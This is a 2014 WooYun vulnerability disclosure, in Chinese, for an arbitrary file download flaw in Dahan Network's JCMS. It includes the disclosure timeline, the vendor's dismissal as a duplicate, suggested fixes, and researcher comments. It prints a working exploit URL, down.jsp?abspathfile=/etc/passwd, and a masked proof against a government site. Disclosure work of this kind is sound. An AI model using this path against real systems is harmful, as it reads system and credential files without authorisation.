大汉网络JCMS任意文件下载

漏洞概要

缺陷编号:WooYun-2014-054809

漏洞标题:大汉网络JCMS任意文件下载

相关厂商:南京大汉网络有限公司

漏洞作者:矿主

提交时间:2014-03-30 15:51

公开时间:2014-06-25 15:52

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2014-03-30: 细节已通知厂商并且等待厂商处理中
2014-03-31: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-05-25: 细节向核心白帽子及相关领域专家公开
2014-06-04: 细节向普通白帽子公开
2014-06-14: 细节向实习白帽子公开
2014-06-25: 细节向公众公开

简要描述:

绝对路径文件下载的问题。

详细说明:

通过分析代码,某个下载功能没有限制权限,没有限制下载类型,通过设置绝对路径的参数,直接下载。漏洞利用:jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd

漏洞证明:

测试代码:http://**.**.**.**/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd鼓楼区政府门户网站:

下载文件内容:

修复方案:

1.限制访问权限;2.限制下载路径和文件类型;

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-2515:52

厂商回复:

感谢关注,该漏洞之前已经在其他安全平台提交过了。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 wefgod 白帽子 | Rank:1438 漏洞数:124)

    重复提交?

  2. 2010-01-01 00:00 Nevermore 白帽子 | Rank:23 漏洞数:3)

    这应该是很早之前的漏洞了吧,download.jsp?

  3. 2010-01-01 00:00 大坑哥 白帽子 | Rank:0 漏洞数:0)

    膜拜矿主。。。咳咳咳这个时间谁发现的早≠谁提交的早。。这个吧。。可真不一定。。。

  4. 2010-01-01 00:00 wefgod 白帽子 | Rank:1438 漏洞数:124)

    还是down.jsp啊。老的版本才有了吧,新版统一处理了,所有平台。